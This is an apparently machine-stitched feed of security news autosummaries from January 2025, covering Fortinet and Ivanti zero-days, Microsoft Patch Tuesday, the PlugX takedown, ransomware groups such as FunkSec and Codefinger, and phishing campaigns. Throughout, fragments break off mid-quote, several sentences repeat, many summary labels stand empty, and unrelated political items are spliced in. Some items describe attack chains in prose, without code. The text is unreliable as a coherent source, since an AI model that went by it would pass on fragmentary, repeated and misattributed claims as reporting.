The campaign likely began in November 2024, the campaign unfolded in four phases: vulnerability scanning (Nov 16–23, 2024), reconnaissance (Nov 22–27), SSL VPN setup (Dec 4–7), and lateral movement (Dec 16–27).A new campaign is likely targeting a zero-day in Fortinet FortiGate firewalls Pierluigi Paganini January 14, 2025 January 14, 2025 Experts warn of a new campaign targeting an alleged zero-day in Fortinet FortiGate firewalls with management interfaces exposed online. "Autosummary:
Microsoft has mitigated this issue by blocking access to the following Microsoft Access documents if they were sent via email: accdb accde accdw accdt accda accdr accdu What makes this interesting is that Unpatched.ai, an AI-assisted vulnerability discovery platform, has discovered all three flaws. "Autosummary:
According to court documents, the list of victims targeted using this malware includes "European shipping companies in 2024, several European Governments from 2021 to 2023, worldwide Chinese dissident groups, and governments throughout the Indo-Pacific (e.g., Taiwan, Hong Kong, Japan, South Korea, Mongolia, India, Myanmar, Indonesia, Philippines, Thailand, Vietnam, and Pakistan). "Fortinet has patched an authentication bypass vulnerability (CVE-2024-55591) affecting its FortiOS firewalls and FortiProxy web gateways that has been exploited as a zero-day by attackers to compromise publicly-exposed FortiGate firewalls. While Fortinet acknowledged in-the-wild exploitation in the accompanying security advisory, they did share any attack-related information except indicators of compromise (IoCs): IP addresses, log entries, created users, and a list of operations performed by the threat actor. Some of those IoCs overlap with those shared … More
The post Fortinet fixes FortiOS zero-day exploited by attackers for months (CVE-2024-55591) appeared first on Help Net Security.
"Autosummary:
The campaign unfolded in four distinct phases, which involved: Automated vulnerability scanning (+ zero-day exploitation + numerous successful admin login events) – from November 16, 2024 to November 23, 2024 Reconnaissance (+ configuration changes, the purpose of which is still unknown) – from November 22, 2024 to November 27, 2024 Creation of new super admin and local user accounts or hijacking of existing accounts + adding of those accounts to existing groups for SSL VPN access + creating new SSL VPN portals + establishing SSL VPN tunnels with the affected devices – from December 4, 2024 to December 7, 2024 Extracting credentials for lateral movement – from December 16, 2024 to December 27, 2024. "Autosummary:
"Autosummary:
"The most sensitive accounts included HR systems, which contained tax documents, pay stubs, insurance information, social security numbers, and more," Ayrey said. "Autosummary:
“What makes this Double-Tap infection chain quite unique is that it employs many tricks to bypass security solutions such as storing the real malicious macro code in the settings.xml file and creating a scheduled task without spawning schtasks.exe for the second document or using, for the first document, an anti-emulation trick aimed to see if the execution time has not been altered, otherwise the macro is stopped.” continues the report. "Autosummary:
Additionally, the lawsuit alleges that Allstate also purchased location data directly from Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram, to use for the same purposes. "Autosummary:
"Microsoft has marked January 2025 Patch Tuesday with a hefty load of patches: 157 CVE-numbered security issues have been fixed in various products, three of which (in Hyper-V) are being actively exploited. The exploited Hyper-V vulnerabilities The exploited zero-days are CVE-2025-21333 (a buffer overflow bug), CVE-2025-21334 and CVE-2025-21335 (use after free flaws), and they all allow attackers to elevated their privilege to SYSTEM on compromised Windows and Windows Server machines. They affect a component of … More
The post Microsoft fixes actively exploited Windows Hyper-V zero-day flaws appeared first on Help Net Security.
"Autosummary:
But, as noted by Mike Walters, President at Action1, “organizations relying on Hyper-V, including data centers, cloud providers, enterprise IT environments, and development platforms, are at risk. "Autosummary:
This PlugX malware supports a “self-delete” command that instruct the malware to: delete the files created by the PlugX malware on the victim computer delete the PlugX registry keys used to automatically run the PlugX application when the victim computer is started, create a temporary script file to delete the PlugX application after it is stopped, stop the PlugX application, run the temporary file to delete the PlugX application, delete the directory created on the victim computer by the PlugX malware to store the PlugX files, and delete the temporary file from the victim computer. "Autosummary:
"This decision puts an end to specific coercive measures that, along with many others, cause serious damage to the Cuban economy, with a severe effect on the population," the country"s ministry of foreign affairs said in a statement. "Autosummary:
According to court documents, the list of victims targeted using this malware includes "European shipping companies in 2024, several European Governments from 2021 to 2023, worldwide Chinese dissident groups, and governments throughout the Indo-Pacific (e.g., Taiwan, Hong Kong, Japan, South Korea, Mongolia, India, Myanmar, Indonesia, Philippines, Thailand, Vietnam, and Pakistan). "Autosummary:
"Autosummary:
"Autosummary:
The text of the messages comes in all the variations that phishers love to use: Undeliverable packages from USPS, EVRI, Royal Mail, DHL, Fedex, etc. Unpaid road toll. It’s also important to know that there are similar instructions for the Chrome browser: “Reply with 1, exit the SMS message, and reopen the SMS activation link, or copy the link to Google Chrome to open it.)” "Personal data of nearly 100,000 individuals that have participated in trainings organized by CEPOL, the European Union (EU) Agency for Law Enforcement Training, has potentially been compromised due to the cyberattack suffered by the agency in May 2024. “Starting in October 2024, until 31 December 2024, over 97 000 notifications were sent to people whose personal data were processed in the 31 processing activities identified as high risk in the context of the data breach … More
The post EU law enforcement training agency data breach: Data of 97,000 individuals compromised appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
This week’s list includes — CVE-2024-8474 (OpenVPN Connect), CVE-2024-46981 (Redis), CVE-2024-51919, CVE-2024-51818 (Fancy Product Designer plugin), CVE-2024-12877 (GiveWP – Donation Plugin and Fundraising Platform), CVE-2024-12847 (NETGEAR DGN1000), CVE-2025-23016 (FastCGI fcgi2), CVE-2024-10215 (WPBookit plugin), CVE-2024-11350 (AdForest theme), CVE-2024-13239 (Drupal), CVE-2024-54676 (Apache OpenMeetings) CVE-2025-0103 (Palo Alto Networks Expedition), CVE-2024-53704 (SonicWall SonicOS), CVE-2024-50603 (Aviatrix Controller), CVE-2024-9138, and CVE-2024-9140 (Moxa).India, Germany, the U.S., France, Brazil, South Korea, Belgium, Spain, Poland, and Italy accounted for the top 10 countries with the most number of requests.India, Germany, the U.S., France, Brazil, South Korea, Belgium, Spain, Poland, and Italy accounted for the top 10 countries with the most number of requests.Popular Windows Applications Vulnerable to WorstFit Attack — Several Windows-based applications such as curl.exe, excel.exe, openssl.exe, plink.exe, tar.exe, and wget.exe have been found susceptible to a brand-new attack surface called WorstFit, which exploits a character conversion feature built into Windows called Best-Fit." — As companies rush to leverage artificial intelligence (AI) applications, MLOps platforms used to develop, train, deploy and monitor such applications could be targeted by attackers, allowing them to not only gain unauthorized access, but also impact the confidentiality, integrity and availability of the machine learning (ML) models and the data they provide.The attacks involve the use of Windows Shortcut (LNK), Windows Installer (MSI), and Microsoft Management Console (MSC) files, likely distributed via spear-phishing, as the first-stage component to trigger the infection chain, ultimately leading to the deployment of PlugX using DLL side-loading techniques.The attacks involve the use of Windows Shortcut (LNK), Windows Installer (MSI), and Microsoft Management Console (MSC) files, likely distributed via spear-phishing, as the first-stage component to trigger the infection chain, ultimately leading to the deployment of PlugX using DLL side-loading techniques.MLOps Platforms Could Become a New Attack Target — As companies rush to leverage artificial intelligence (AI) applications, MLOps platforms used to develop, train, deploy and monitor such applications could be targeted by attackers, allowing them to not only gain unauthorized access, but also impact the confidentiality, integrity and availability of the machine learning (ML) models and the data they provide. "Autosummary:
Once decrypted, the "vpxuser" account can be used for root permissions operations, including altering configurations, changing passwords of other accounts, SSH login, and executing ransomware.As organizations are dealing with compounded threats on an ever-expanding front: new vulnerabilities, new entry points, monetized cyber-crime networks, and more, there is ever-growing urgency for enhanced security measures and vigilance. Therefore, in ransomware, asymmetric encryption is primarily used for securing the keys used in symmetric encryption, rather than the data itself. "Autosummary:
"Autosummary:
The Aviatrix Controller, part of the Aviatrix Cloud Networking Platform, enhances networking, security, and operational visibility for multi-cloud environments. "Autosummary:
" Nominet customer notice (BleepingComputer) Attacks linked to suspected Chinese hackers While the company didn"t share more information on the VPN zero-day used in the attack, Ivanti said last week that hackers have been exploiting a critical Ivanti Connect Secure zero-day vulnerability (tracked as CVE-2025-0282) to breach a limited number of customers" appliances. "Autosummary:
Encrypting cloud storage Amazon Simple Storage Service (S3) is a scalable, secure, and high-speed object storage service by Amazon Web Services (AWS), and S3 buckets are cloud storage containers for storing files, data backups, media, logs, etc. "Autosummary:
Francier Obando Pinillo, of Miami, Florida, is alleged to have exploited his position at a Spanish-language church in Pasco, Washington, to persuade members of his congregation and others to invest in a cryptocurrency venture called "Solano Fi." Pinillo is alleged to have falsely claimed that his Solano Fi cryptocurrency scheme was risk-free, and promised a 34.9% monthly return. "A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. They do not exfiltrate the data beforehand, but mark the encrypted files for deletion within seven days, thus adding more pressure on organizations to pay the ransom. How does the attack unfold? The threat actor leverages targets’ previous compromised (whether … More
The post Attackers are encrypting AWS S3 data without using ransomware appeared first on Help Net Security.
"Autosummary:
“The attacker initiates the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header, utilizing an AES-256 encryption key they generate and store locally,” the Halcyon research team explained. "Autosummary:
"Autosummary:
The threat actors specifically targeted the Office of Foreign Assets Control (OFAC), which administers trade and economic sanctions programs, and the Committee on Foreign Investment in the United States (CFIUS), which reviews foreign investments for national security risks. "The number of internet-facing Ivanti Connect Secure instances vulnerable to attack via CVE-2025-0282 has fallen from 2,048 to 800 in the last four days, the Shadowserver Foundation shared today. In the meantime, UK domain registry Nominet became the first publicly known victim of attackers exploiting the recently patched Ivanti zero-day. CVE-2025-0282 zero-day attacks CVE-2025-0282 is a stack-based buffer overflow vulnerability that allowed unauthenticated attackers to breach VPN appliances used by a number of (still publicly … More
The post UK domain registry Nominet breached via Ivanti zero-day appeared first on Help Net Security.
"Autosummary:
"Autosummary:
U.S. CISA adds BeyondTrust PRA and RS and Qlik Sense flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini January 13, 2025 January 13, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds BeyondTrust PRA and RS and Qlik Sense flaws to its Known Exploited Vulnerabilities catalog. "Autosummary:
Inexperienced actors developed the FunkSec ransomware using AI tools Pierluigi Paganini January 13, 2025 January 13, 2025 FunkSec, a new ransomware group that attacked more than 80 victims in December 2024, was developed using AI tools. Once executed, FunkSec ransomware disables security features, including Windows Defender, logging, PowerShell restrictions, and shadow copy backups during execution. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Ivanti Connect Secure zero-day exploited by attackers (CVE-2025-0282) Ivanti has fixed two vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, one of which (CVE-2025-0282) has been exploited as a zero-day by attackers to compromise Connect Secure VPN appliances. January 2025 Patch Tuesday forecast: Changes coming in cybersecurity guidance Microsoft released a small set of updates that only applied … More
The post Week in review: Exploited Ivanti Connect Secure zero-day, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: January 10, 2025 Here’s a look at the most interesting products from the past week, featuring releases from BioConnect, BreachLock, McAfee, Netgear, and Swimlane. Balancing proprietary and open-source tools in cyber threat research In this Help Net Security interview, Thomas Roccia, Senior Security Researcher at Microsoft, discusses how threat research drives faster, better decision-making in cybersecurity operations. "Autosummary:
"Autosummary:
Responding to Russell"s criticism, a Meta spokesperson told the BBC there was "no change to how we treat content that encourages suicide, self-injury, and eating disorders" and said the company would "continue to use our automated systems to scan for that high-severity content". "Autosummary:
SMS phishing attacks with disabled links Source: BleepingComputer While neither of these phishing lures is new, we noticed that these smishing texts, and others seen recently, ask users to reply with "Y" to enable the link. "Autosummary:
The list of targets is long and includes the Ministry of Foreign Affairs, the Ministry Infrastructure and Transport, Italy’s financial markets regulator Consob, the Air Force, the Navy, the Carabinieri and local public transport companies, including Rome’s Atac, and Genoa’s Amt. Noname057(16) hackers also hit Italian banks, including Intesa, Monte Paschi di Siena, and Italian ports of the cities of Taranto and Trieste. "Autosummary:
" It"s worth pointing out that the use of proxy services to illegally access LLM services was highlighted by Sysdig in May 2024 in connection with an LLMjacking attack campaign targeting AI offerings from Anthropic, AWS Bedrock, Google Cloud Vertex AI, Microsoft Azure, Mistral, and OpenAI using stolen cloud credentials and selling the access to other actors. "Autosummary:
"Additionally, in the advertisement, Blender was described as not requiring users to sign up, register, or "provide any kind of detail except the receiving address!"" It"s also accused of facilitating money laundering for Russia-aligned ransomware gangs like TrickBot, Conti (formerly Ryuk), Sodinokibi (aka REvil), and Gandcrab. "Autosummary:
“This money request is then distributed to the targeted victims, and the Microsoft365 SRS (Sender Rewrite Scheme) rewrites the sender to, e.g., bounces+SRS=onDJv=S6[@]5ln7g7.onmicrosoft.com, which will pass the SPF/DKIM/DMARC check.” continues the report. "Autosummary:
The categories of information compromised include name, address, date of birth, age, drivers’ license number, passport number, photograph, the signatures appearing on a government ID card, medical cannabis cards, transaction histories, and other personal information. "Autosummary:
As this PIN is only known to you, your accountant (if not self-filing), and the IRS, it prevents scammers from filing a tax return using your Social Security Number and personal information. "Autosummary:
"Autosummary:
DoJ charged three Russian citizens with operating crypto-mixing services Pierluigi Paganini January 11, 2025 January 11, 2025 The U.S. Department of Justice charged three Russian citizens with operating crypto-mixing services that helped crooks launder cryptocurrency. "As a company fortunate enough to have and maintain our own pentesting team, we often do outreach with other organizations to assist with or provide our expertise in offensive security. In collaboration with the Kerala Police Cyber unit, we were able to assist with investigating a prolific scam targeting the State bank of India (SBI). SBI is the largest bank in India and one of the top 50 largest banks in the world with over … More
The post The SBI fake banking app shows that SMS authentication has had its day appeared first on Help Net Security.
"Autosummary:
The app spoofs the SBI bank login page to collect data from the end user (e.g., account number, card number, password, etc.) and send it to the attacker, who will subsequently use it to log into the legitimate site. "In this Help Net Security interview, Dr. Darren Williams, CEO at BlackFog, talks about how employee training plays a crucial role in preventing ransomware attacks. He points out that human error is often the biggest security risk and explains how AI tools, alongside gamification and real-time alerts, help employees identify advanced phishing threats. What role does employee awareness training play in preventing ransomware attacks? What innovative approaches can make such training more effective? Awareness training … More
The post Preventing the next ransomware attack with help from AI appeared first on Help Net Security.
"Autosummary:
Next, it is important to understand WHO is affected and WHAT sort of data is involved, because this will dictate your next critical step, which is communication with the authorities, internally and with customers.Now, with triple extortion, attackers target not only the initial victim but also customers, partners, regulators and even shareholders.In this Help Net Security interview, Dr. Darren Williams, CEO at BlackFog, talks about how employee training plays a crucial role in preventing ransomware attacks. "Welcome to 2025 and a new year of patch excitement! In my December article, I talked about Microsoft’s Secure Future Initiative (SFI) and how it manifested in many of the Microsoft products released in 2024. While this security technology trend will continue in 2025, I believe we will also see some major changes to guidance regarding the security requirements, operations, and other aspects associated with our industry. Before we get into some of those details, … More
The post January 2025 Patch Tuesday forecast: Changes coming in cybersecurity guidance appeared first on Help Net Security.
"Autosummary:
Microsoft set of updates Microsoft released a small set of updates that only applied to Windows 10, Windows 11, Office, and Sharepoint.While this security technology trend will continue in 2025, I believe we will also see some major changes to guidance regarding the security requirements, operations, and other aspects associated with our industry. "Autosummary:
"Autosummary:
It"s also tracked by the cybersecurity community under the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, Mustang Panda (and its closely related Vertigo Panda), Red Lich, Stately Taurus, TA416, and Twill Typhoon. "Autosummary:
" The malicious GitHub repository in question – github[.]com/YoonJae-rep/CVE-2024-49113 (now taken down) – is said to be a fork of the original repository from SafeBreach Labs hosting the legitimate PoC. The counterfeit repository, however, replaces the exploit-related files with a binary named "poc.exe" that, when run, drops a PowerShell script to create a scheduled task to execute a Base64-encoded script. "Autosummary:
My advice is to enable 2FA on any accounts which offer it - your bank accounts, your email accounts, your social media accounts, your cryptocurrency accounts, and more... "Autosummary:
Sample Report: Vulnerability and Scan Findings Sample Report: Risk Mitigation Plan Streamlining reporting with technology Manual reporting processes—juggling spreadsheets, extracting charts, and compiling disconnected data—are time-consuming and error-prone. According to Miller, "Cybersecurity reporting is about creating a shared vision with your clients, where they see cybersecurity as a driver of growth, efficiency, and long-term success. Elements of an effective vCISO report To make reports valuable and actionable, focus on these key components: Know your audience: Tailor your reports to different stakeholders.While reporting is seen as a requirement for tracking cybersecurity progress, it often becomes bogged down with technical jargon, complex data, and disconnected spreadsheets that fail to resonate with decision-makers." The guide—"Taking the Pain Out of Cybersecurity Reporting"—walks you through how to transform raw data into compelling narratives, demonstrate measurable value, and shape the future of your client"s cybersecurity strategy. "Autosummary:
Some of the prominent actors associated with FunkSec are listed below - A suspected Algeria-based actor named Scorpion (aka DesertStorm) who has promoted the group on underground forums such as Breached Forum El_farado, who emerged as a main figure advertising FunkSec after DesertStorm"s ban from Breached Forum XTN, a likely associate who is involved in an as-yet-unknown "data-sorting" service Blako, who has been tagged by DesertStorm along with El_farado Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, either pointing to a loose affiliation or their attempts to impersonate FunkSec The possibility that the group may also be dabbling in hacktivist activity is evidenced by the presence of DDoS attack tools, as well as those related to remote desktop management (JQRAXY_HVNC) and password generation (funkgenerate). "Autosummary:
"Autosummary:
"Autosummary:
Docker"s service status page Source: Docker How to fix As Docker is still investigating the incident, it has provided the following ways to resolve the malware warning problems: Upgrade Docker Desktop to version 4.37.2, which includes a permanent fix. "Autosummary:
"The categories of information compromised include name, address, date of birth, age, drivers" license number, passport number, photograph, the signatures appearing on a government ID card, medical cannabis cards, transaction histories, and other personal information. "Autosummary:
An investigation showed that the exposed files contained information that varied per patient but could have included the patient’s name and one or more of the following: Social Security number (SSN) Driver’s license number Date of birth The services received and the dates of service Insurance information Treating provider Treatment and/or diagnostic information While BayMark did not provide any information about the number of victims or the nature of the accident, it has been separately reported that the RansomHub ransomware group has BayMark listed on their leak site. "In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. He shares tips for maintaining development speed, fostering collaboration, and using metrics to track DevSecOps success. What are organizations’ most significant challenges when shifting from DevOps to DevSecOps? The complexity of organizations’ build processes and developer ecosystems is a significant challenge for those seeking to … More
The post GitLab CISO on proactive monitoring and metrics for DevSecOps success appeared first on Help Net Security.
"Autosummary:
Organizations should take steps to ease the implementation of security into their systems to avoid complexity from suboptimal design decisions, such as difficult-to-maintain code and redundant dependencies, which can create a larger attack surface and generate more security scan findings for teams to sort through, prioritize, and address. While developers in DevOps may deploy code dozens or hundreds of times a day, scanners, for example, static application security tools (SAST), often run on a scheduled basis, leading to delays in feedback loops.In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. "As we look ahead to cybersecurity developments in 2025, there’s bad news and good—expect to see new challenging attacks and the cybersecurity community increasingly working together to counter threats that are beyond the scope of individual organizations.
The post Cybersecurity in 2025: Global conflict, grown-up AI, and the wisdom of the crowd appeared first on Help Net Security.
"Autosummary:
AI as a tool, a target, and a threat In 2025, expect the AI hype to subside, some real-world use cases of generative AI start to emerge, and AI security and safety to mature significantly. CISOs, and the organizations they serve, will increasingly need to take a wider view to ensure robust cybersecurity, putting greater focus on the security of every component of their supply chains. "Autosummary:
Some of the other post-exploitation activities carried out are listed below - Perform internal network reconnaissance using built-in tools like nmap and dig Use the LDAP service account to perform LDAP queries and move laterally within the network, including Active Directory servers, through SMB or RDP Steal application cache database containing information associated with VPN sessions, session cookies, API keys, certificates, and credential material Deploy a Python script named DRYHOOK to harvest credentials Mandiant also cautioned that it"s possible multiple hacking groups are responsible for the creation and deployment of SPAWN, DRYHOOK, and PHASEJAM, but noted it doesn"t have enough data to accurately estimate the number of threat actors targeting the flaw. "Wireshark, the popular network protocol analyzer, has reached version 4.4.3. Wireshark offers deep inspection across hundreds of protocols, live and offline analysis, and display filters. With multi-platform support, VoIP analysis, and capture file compatibility, it’s perfect for professionals seeking intuitive GUI or TTY-mode network troubleshooting and analysis capabilities. Wireshark 4.4.3 bug fixes Potential mismatch in GSM MAP dissector for uncertainty radius and filter key. Macro eNodeB ID and Extended Macro eNodeB ID not decoded by … More
The post Wireshark 4.4.3 released: Updated protocol support, bug fixes appeared first on Help Net Security.
"Autosummary:
PER, BACapp, BBLog, BT BR/EDR RF, CQL, Diameter, DOF, ECMP, FiveCo RAP, FTDI FT, GSM COMMON, GTPv2, HCI_MON, HSRP, HTTP2, ICMPv6, IEEE 802.11, Kafka, LTE RRC, MBIM, MMS, Modbus/TCP, MPEG PES, NAS-EPS, NFS, NGAP, NR RRC, PLDM, PN-DCP, POP, ProtoBuf, PTP, RLC, RPC, RTCP, sFlow, SIP, SRT, TCP, UCP, USBCCID, Wi-SUN, and ZigBee ZCL Wireshark is available for free download here. "Autosummary:
"The zero-day attacks leveraging the Ivanti Connect Secure (ICS) vulnerability (CVE-2025-0282) made public on Wednesday were first spotted in mid-December 2024, Mandiant researchers have shared. It’s still impossible to say whether they were mounted by a single threat actor, but the use of known malware on at least one of the compromised VPN appliances points to China-nexus espionage actor(s) – UNC5337 and UNC5221 – that have exploited ICS zero-days several times in the past few … More
The post Ivanti Connect Secure zero-day exploited since mid-December (CVE-2025-0282) appeared first on Help Net Security.
"Autosummary:
Exploitation of the vulnerability generally followed these steps: Disable SELinux -> Prevent syslog forwarding -> Remount the drive as read-write -> Write and execute the script -> Deploy web shell(s) -> Remove specific log entries from debug and application logs -> Reenable SELinux -> Remount the drive. "Autosummary:
"Autosummary:
U.S. CISA adds Ivanti Connect Secure, Policy Secure, and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini January 09, 2025 January 09, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure, and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
Until they upgrade, customers are advised to force quit the OpenAndSavePanelService process that hangs because of this issue and save files to a location other than their Desktop, Documents, or OneDrive folders. "Autosummary:
" Silk Typhoon (also known as Hafnium) is a Chinese nation-state hacking group known for attacking a wide range of targets in the United States, Australia, Japan, and Vietnam, including defense contractors, policy think tanks, and non-governmental organizations (NGOs) as well as healthcare, law firms, and higher education organizations. "Autosummary:
The attackers also install ‘Spawn’ tools like Spawnmole (tunneler), Spawnsnail (SSH backdoor), and Spawnsloth (log tampering utility), which, unlike the Phasejam web shell, can persist across system upgrades. "Autosummary:
AI SPERA’s "Criminal IP" has recently entered the marketplace of major US data warehousing platforms, including Amazon Web Services (AWS), Microsoft Azure, and Snowflake, expanding its global reach for threat data. "Autosummary:
"Autosummary:
The compromised extensions include “Bard AI Chat,” “ChatGPT for Google Meet,” “ChatGPT App,” “ChatGPT Quick Access,” “VPNCity,” “Internxt VPN,” and more, which are used by an estimated total of 2.6 million people. "Autosummary:
Image Guarantees after the transaction: - Your publication will be deleted from this site - All downloaded information, confidential data, personal data, databases will be deleted from the servers - Tools to decrypt your system will be provided if necessary - We will give you information on how to avoid similar attacks in the futureThe gang, which is aligned to the Phobos ransomware-as-a-service group, steals sensitive data from organisations, encrypts victims" computer systems, and demands that a ransom be paid for a decryption key or the data will be published on the dark web. "The Banshee Stealer is a stealthy threat to the rising number of macOS users around the world, including those in Russian-speaking countries, according to Check Point researcher Antonis Terefos. Banshee Stealer was first publicly profiled in August 2024, a month after its developer began selling it as-a-Service for the high price of $3,000 per month. The malware is capable of functioning across both macOS x86_64 and ARM64 architectures, and can capture / steal credentials and … More
The post Banshee Stealer variant targets Russian-speaking macOS users appeared first on Help Net Security.
"Autosummary:
But even after the leak, the threat persists: Check Point has identified multiple campaigns still distributing the malware through phishing websites, ostensibly offering popular software (Telegram, TradingView, Parallels, etc.) for download. "Autosummary:
Ukrainian Cyber Alliance destroyed the connectivity of Russian ISP Nodex Pierluigi Paganini January 09, 2025 January 09, 2025 A group of hacktivists, known as the Ukrainian Cyber Alliance, breached Russian ISP Nodex, stole sensitive documents, and wiped systems. "Autosummary:
"Autosummary:
" Documents exposed during the incident contained various types of data for each affected patient, including their names and: Social Security number, driver"s license number, date of birth, services received and dates of service, insurance information, treating provider and treatment and/or diagnostic information. "Despite organizations’ repeated attempts at security awareness training, with a particular emphasis on how employees can avoid being phished, in 2024 enterprise users clicked on phishing lures at a rate nearly three times higher than in 2023, according to Netskope. More than eight out of every 1,000 users clicked on a phishing link each month – up 190% from last year when fewer than three per thousand enterprise users fell prey to phishing attempts. Where … More
The post The top target for phishing campaigns appeared first on Help Net Security.
"Autosummary:
Sensitive data being leaked through personal apps is top of mind for most organizations, with the most common type of data policy violation being for regulated data (60%), which included personal, financial, or healthcare data being uploaded to personal apps. In 2024, 88% of all employees used personal cloud apps each month, with 26% uploading, posting, or otherwise sending data to personal apps. "AI Penetration Tester Microsoft | Canada | Remote – View job details As an AI Penetration Tester, you will discover and exploit vulnerabilities end-to-end in order to assess the security of AI systems. Execute offensive operations on production AI systems using real world adversarial tactics and techniques to identify failures. Develop tools and techniques to scale and accelerate offensive emulation and vulnerability discovery specific for AI systems. Application Security Engineer Emerson | India | Hybrid … More
The post Cybersecurity jobs available right now: January 8, 2025 appeared first on Help Net Security.
"Autosummary:
Information Security Specialist – Red Team Operator TD | Canada | Hybrid – View job details As an Information Security Specialist – Red Team Operator, you will define, develop, implement, and manage standards, policies, procedures, and solutions that mitigate risk and maximize security, availability of service, efficiency and effectiveness. Application Security Engineer Emerson | India | Hybrid – View job details As an Application Security Engineer, your responsibilities will include analyzing UML diagrams, DFDs, and threat models for security flaws while providing detailed recommendations for software and system setups to address them, mentoring developers on security topics and secure coding practices, developing and delivering security training for developers and management, analyzing requirements and conducting code reviews to identify security flaws, and establishing direction for security requirements in custom hardware and software. Senior Manager, Global Incident Response Experian | USA | Remote – View job details As a Senior Manager, Global Incident Response, you will develop and grow the Advanced Response team’s processes, capabilities, and overarching strategy to contribute to an overall increase in incident response effectiveness at Experian. IT Security Engineer Alpitronic | Italy | On-site – View job details As an IT Security Engineer, you will perform risk assessment analysis, by identifying vulnerabilities that could be exploited by malicious attackers, to proactively anticipate and prevent cyber-attacks. "Autosummary:
"Autosummary:
Some of the other security flaws exploited by the botnet to extend its reach and scale include CVE-2013-3307, CVE-2013-7471, CVE-2014-8361, CVE-2016-20016, CVE-2017-17215, CVE-2017-5259, CVE-2020-25499, CVE-2020-9054, CVE-2021-35394, CVE-2023-26801, CVE-2024-8956, and CVE-2024-8957. "Autosummary:
"Autosummary:
Below are the descriptions for the vulnerabilities added to the catalog: CVE-2020-2883 (CVSS score 9.8) is a vulnerability in Oracle WebLogic Server (versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0). "Autosummary:
Watch: Danish PM says "Greenland is for the Greenlandic people" Trump also vowed to use "economic force" when asked if he would attempt to annex Canada and called their shared border an "artificially drawn line".Among other things, he suggested renaming the Gulf of Mexico the "Gulf of America" and restated his opposition to wind power, saying wind turbines are "driving the whales crazy". "CISA has added Mitel MiCollab (CVE-2024-41713, CVE-2024-55550) and Oracle WebLogic Server (CVE-2020-2883) vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The Mitel MiCollab vulnerabilities exploited Mitel MiCollab is a popular enterprise collaboration suite. CVE-2024-41713 and CVE-2024-55550 are both path traversal vulnerabilities. The former is exploitable without authentication, and may allow an attacker to gain access “to provisioning information including non-sensitive user and network information and perform unauthorized administrative actions on the MiCollab Server.” The latter … More
The post Mitel MiCollab, Oracle WebLogic Server vulnerabilities exploited by attackers appeared first on Help Net Security.
"Autosummary:
In this latest KEV update, CISA has also urged users and administrators to review threat briefs and security bulletins related to CVE-2024-0012 and CVE-2024-9474, two vulnerabilities in Palo Alto Networks firewalls that have been exploited (as zero-days) by attackers in November 2024. "Autosummary:
Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc.It can secretly record a victim"s screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites.First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. Analysis of a XWorm Attack Phishing emails are often the initial stage of XWorm attacks In this attack, we can see the original phishing email, which features a link to a Google drive. "Autosummary:
Pressed by journalists on whether he would rule out using military or economic force to acquire Greenland and the Panama Canal, he said: "No, I can"t assure you on either of those two." Panama"s foreign minister denied his country had received any kind of offer from the president-elect. "Autosummary:
CVE-2025-0282 is a critical (9.0) stack-based buffer overflow bug in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allow a unauthenticated attacker to remotely execute code on devices. "Autosummary:
Since then, UCA cyber activists have claimed many breaches impacting various Russian organizations, including the Russian Ministry of Defense, Commonwealth of Independent States Institute (financed by the Russian state company Gazprom), the Donetsk People"s Republic"s Ministry of Coal and Energy, Vladimir Putin"s political adviser Vladislav Surkov, and multiple Russian military officers and media outlets, among others. "Autosummary:
" A SonicWall security bulletin tracks this flaw as CVE-2024-53704 (CVSS v3.0 score: 8.2, "high"), stating it impacts multiple generation six and generation seven firewalls, running 6.5.4.15-117n and older and 7.0.1-5161 and older versions. "Autosummary:
"Ivanti has fixed two vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, one of which (CVE-2025-0282) has been exploited as a zero-day by attackers to compromise Connect Secure VPN appliances. About CVE-2025-0282 and CVE-2025-0283 Both are stack-based buffer overflow issues: CVE-2025-0282 allows for unauthenticated remote code execution, CVE-2025-0283 can be used by a local authenticated attacker to escalate their privileges. Ivanti says that a “limited number “of customers’ Ivanti Connect Secure appliances have … More
The post Ivanti Connect Secure zero-day exploited by attackers (CVE-2025-0282) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Gayfemboy exploits various vulnerabilities, including CVE-2013-3307, CVE-2021-35394, CVE-2024-8957, and others in DVRs, routers, and security appliances.Gayfemboy Botnet targets Four-Faith router vulnerability Pierluigi Paganini January 08, 2025 January 08, 2025 Gayfemboy, a Mirai botnet variant, has been exploiting a flaw in Four-Faith industrial routers to launch DDoS attacks since November 2024. "Autosummary:
